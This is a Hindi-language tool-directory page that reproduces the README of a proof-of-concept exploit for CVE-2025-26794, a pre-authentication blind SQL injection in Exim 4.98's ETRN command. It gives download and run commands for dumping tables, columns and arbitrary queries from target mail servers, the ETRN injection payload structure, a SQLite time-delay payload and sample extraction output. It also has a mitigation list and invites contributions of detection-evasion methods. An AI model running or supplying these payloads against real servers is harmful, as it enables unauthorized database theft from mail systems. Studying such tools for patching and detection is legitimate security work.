Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-26794-exploit — Exim 4.98 में CVE-2025-26794 के लिए SQL injection एक्सप्लॉइट। समय-आधारित ब्लाइंड SQLi के माध्यम से स्वचालित डेटा निष्कर्षण। केवल अधिकृत पेनेट्रेशन परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/xploitgh0st/cve-2025-26794-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubxploitgh0st/cve-2025-26794-exploit

CVE-2025-26794-exploit

Exim 4.98 में CVE-2025-26794 के लिए SQL injection एक्सप्लॉइट। समय-आधारित ब्लाइंड SQLi के माध्यम से स्वचालित डेटा निष्कर्षण। केवल अधिकृत पेनेट्रेशन परीक्षण के लिए।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-26794: Exim ETRN SQL इंजेक्शन एक्सप्लॉइट

Python Version License Status

CVE-2025-26794 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट टूल, जो SQLite DBM स्टोरेज का उपयोग करते समय ETRN कमांड के माध्यम से Exim 4.98 मेल सर्वर में SQL इंजेक्शन भेद्यता प्रदर्शित करता है।

⚠️ कानूनी अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए

यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन परीक्षण के लिए प्रदान किया गया है। अनधिकृत पहुँच विभिन्न कानूनों के तहत अवैध है, जिनमें शामिल हैं:

  • संयुक्त राज्य अमेरिका में कंप्यूटर फ्रॉड एंड अब्यूज़ एक्ट (CFAA)
  • यूनाइटेड किंगडम में कंप्यूटर मिसयूज़ एक्ट
  • अन्य न्यायक्षेत्रों में समान विधान

किसी भी सिस्टम का परीक्षण करने से पहले आपके पास स्पष्ट लिखित प्राधिकरण होना चाहिए जो आपके स्वामित्व में नहीं है।

लेखक और योगदानकर्ता इस टूल के दुरुपयोग या इससे होने वाली क्षति के लिए कोई दायित्व नहीं मानते हैं।

📋 भेद्यता अवलोकन

CVE-2025-26794 Exim 4.98 में एक SQL इंजेक्शन भेद्यता है जो निम्न स्थितियों में उत्पन्न होती है:

  • Exim को SQLite DBM स्टोरेज के साथ कॉन्फ़िगर किया गया हो
  • ETRN कमांड हैंडलर सीरियलाइज़्ड डेटा को संसाधित करता है
  • SQL क्वेरी निर्माण से पहले उपयोगकर्ता-नियंत्रित इनपुट को पर्याप्त रूप से सैनिटाइज़ नहीं किया जाता है

यह भेद्यता हमलावरों को अनुमति देती है:

  • मेल सर्वर डेटाबेस से संवेदनशील डेटा निकालना
  • समय-आधारित ब्लाइंड SQL इंजेक्शन हमले करना
  • डेटाबेस संरचना (तालिकाएँ, कॉलम, डेटा) की गणना करना

प्रभावित संस्करण

  • SQLite DBM कॉन्फ़िगरेशन के साथ Exim 4.98

हमला वेक्टर

  • नेटवर्क-सुलभ SMTP सेवा (आमतौर पर पोर्ट 25)
  • किसी प्रमाणीकरण की आवश्यकता नहीं (ETRN कमांड प्री-ऑथ उपलब्ध)

🚀 विशेषताएँ

  • भेद्यता परीक्षण: लक्ष्य भेद्य है या नहीं, यह पुष्टि करने के लिए स्वचालित जाँच
  • समय-आधारित ब्लाइंड SQLi: डेटा निष्कर्षण के लिए SQLite समय-विलंब तकनीकों का उपयोग करता है
  • बाइनरी खोज अनुकूलन: कुशल कैरेक्टर-दर-कैरेक्टर निष्कर्षण
  • स्वचालित डेटाबेस डंप: तालिकाओं, कॉलमों और नमूना डेटा को निकालता है
  • इंटरैक्टिव मोड: इंटरैक्टिव रूप से कस्टम SQL क्वेरी निष्पादित करें
  • मल्टी-मोड संचालन: लचीली निष्कर्षण रणनीतियाँ

📦 स्थापना

आवश्यकताएँ

  • Python 3.6 या उच्चतर
  • लक्ष्य SMTP सर्वर तक नेटवर्क पहुँच

सेटअप

root@kitploit:~
# रिपॉज़िटरी क्लोन करें
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit

# निर्भरताएँ स्थापित करें (कोई आवश्यक नहीं - केवल मानक लाइब्रेरी का उपयोग करता है)
pip install -r requirements.txt

# स्क्रिप्ट को निष्पादन योग्य बनाएँ (Linux/Mac)
chmod +x exploit.py

💻 उपयोग

मूल सिंटैक्स

root@kitploit:~
python3 exploit.py <target> [options]

त्वरित उदाहरण

1. जाँचें कि लक्ष्य भेद्य है या नहीं

root@kitploit:~
python3 exploit.py 192.168.1.10 --test-only

2. स्वचालित डेटाबेस डंप

root@kitploit:~
python3 exploit.py mail.example.com --auto-dump

3. इंटरैक्टिव SQL क्वेरी मोड

root@kitploit:~
python3 exploit.py 10.0.0.5 --interactive

4. विशिष्ट तालिका संरचना निकालें

root@kitploit:~
python3 exploit.py 192.168.1.10 --table users --columns

5. कस्टम SQL क्वेरी निष्पादित करें

root@kitploit:~
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"

कमांड-लाइन विकल्प

🔍 यह कैसे काम करता है

हमला प्रवाह

  1. कनेक्शन: लक्ष्य सर्वर पर SMTP कनेक्शन स्थापित करता है
  2. बेसलाइन माप: प्रतिक्रिया समय मापने के लिए सामान्य ETRN कमांड भेजता है
  3. इंजेक्शन परीक्षण: भेद्यता की पुष्टि करने के लिए समय-विलंब SQL पेलोड भेजता है
  4. डेटा निष्कर्षण: डेटा को कैरेक्टर-दर-कैरेक्टर निकालने के लिए समय-आधारित ब्लाइंड SQLi के साथ बाइनरी खोज का उपयोग करता है

SQL इंजेक्शन पेलोड संरचना

root@kitploit:~
ETRN #',1); <MALICIOUS_QUERY> /*

पेलोड ETRN सीरियलाइज़ेशन हैंडलर में अनुचित सैनिटाइज़ेशन का फायदा उठाता है, जिससे SQLite क्वेरीज़ में SQL इंजेक्शन की अनुमति मिलती है।

समय-आधारित पहचान

SQLite-विशिष्ट समय विलंब का उपयोग करता है:

root@kitploit:~
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))

यह स्थिति सत्य होने पर एक मापने योग्य विलंब (~1-2 सेकंड) उत्पन्न करता है।

📊 उदाहरण आउटपुट

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-26794: Exim SQLi Data Extraction Tool        ║
║                  FOR AUTHORIZED USE ONLY                  ║
╚═══════════════════════════════════════════════════════════╝

[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s

[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users

[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email

🛡️ शमन

यदि आप SQLite DBM के साथ Exim 4.98 चला रहे हैं:

  1. Exim अपडेट करें: पैच किए गए संस्करण (4.98.1 या बाद का) में अपग्रेड करें
  2. इनपुट सत्यापन: सख्त ETRN कमांड सत्यापन लागू करें
  3. पैरामीटराइज़्ड क्वेरीज़: सभी डेटाबेस संचालन के लिए तैयार स्टेटमेंट का उपयोग करें
  4. फ़ायरवॉल नियम: SMTP पहुँच को विश्वसनीय नेटवर्क तक सीमित करें
  5. ETRN अक्षम करें: यदि आवश्यक न हो, तो Exim कॉन्फ़िगरेशन में ETRN कमांड अक्षम करें

🔧 तकनीकी विवरण

बाइनरी खोज एल्गोरिथ्म

एक्सप्लॉइट कैरेक्टर कुशलतापूर्वक निकालने के लिए बाइनरी खोज का उपयोग करता है:

  • ASCII प्रिंट करने योग्य सीमा: 32-126
  • प्रति कैरेक्टर औसत क्वेरी: ~7 (log₂ 94)
  • न्यूनतम नेटवर्क ट्रैफ़िक के लिए अनुकूलित

प्रयुक्त SQLite फ़ंक्शन

  • unicode(): कैरेक्टर का ASCII मान प्राप्त करें
  • substr(): परिणाम से सबस्ट्रिंग निकालें
  • sqlite_master: स्कीमा गणना के लिए सिस्टम तालिका
  • pragma_table_info(): कॉलम मेटाडेटा निष्कर्षण

📚 संदर्भ

  • CVE विवरण: CVE-2025-26794
  • Exim सुरक्षा सलाह: [आधिकारिक Exim सलाह]
  • OWASP SQL इंजेक्शन: OWASP गाइड

🤝 योगदान

निम्नलिखित के लिए योगदान का स्वागत है:

  • प्रदर्शन अनुकूलन
  • अतिरिक्त निष्कर्षण तकनीकें
  • पहचान चोरी के तरीके
  • बग फिक्स और सुधार

कृपया सुनिश्चित करें कि सभी योगदानों में शामिल हैं:

  • स्पष्ट दस्तावेज़ीकरण
  • जिम्मेदार प्रकटीकरण दिशानिर्देश
  • कानूनी उपयोग चेतावनियाँ

📝 लाइसेंस

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए जारी किया गया है। जिम्मेदारी और कानूनी रूप से उपयोग करें।

👤 लेखक

XploitGh0st

  • GitHub: @XploitGh0st

🙏 आभार

  • जिम्मेदार भेद्यता प्रबंधन के लिए Exim विकास टीम
  • सुरक्षा अनुसंधान समुदाय
  • SQLite समय-आधारित इंजेक्शन तकनीक शोधकर्ता

⚖️ जिम्मेदार प्रकटीकरण

यदि आप इस टूल का उपयोग करके भेद्यताएँ खोजते हैं:

  1. विवरण तुरंत सार्वजनिक रूप से प्रकट न करें
  2. विक्रेता/अनुरक्षक से निजी रूप से संपर्क करें
  3. पैचिंग के लिए उचित समय दें (आमतौर पर 90 दिन)
  4. समन्वित प्रकटीकरण दिशानिर्देशों का पालन करें

याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है। इस टूल का उपयोग नैतिक और कानूनी रूप से करें।

टूल डाउनलोड करें
विकल्पविवरण
hostलक्ष्य होस्टनाम या IP पता (आवश्यक)
-p, --portSMTP पोर्ट (डिफ़ॉल्ट: 25)
-t, --timeoutसॉकेट टाइमआउट सेकंड में (डिफ़ॉल्ट: 30)
--thresholdपहचान के लिए समय विलंब सीमा (डिफ़ॉल्ट: 0.8s)
--test-onlyकेवल भेद्यता का परीक्षण करें, कोई डेटा निष्कर्षण नहीं
--auto-dumpडेटाबेस संरचना और डेटा स्वचालित रूप से डंप करें
--interactiveइंटरैक्टिव SQL क्वेरी कंसोल लॉन्च करें
--table TABLEनिष्कर्षण के लिए विशिष्ट तालिका लक्षित करें
--columnsकॉलम नाम निकालें (--table के साथ प्रयोग करें)
--query QUERYकस्टम SQL क्वेरी निष्पादित करें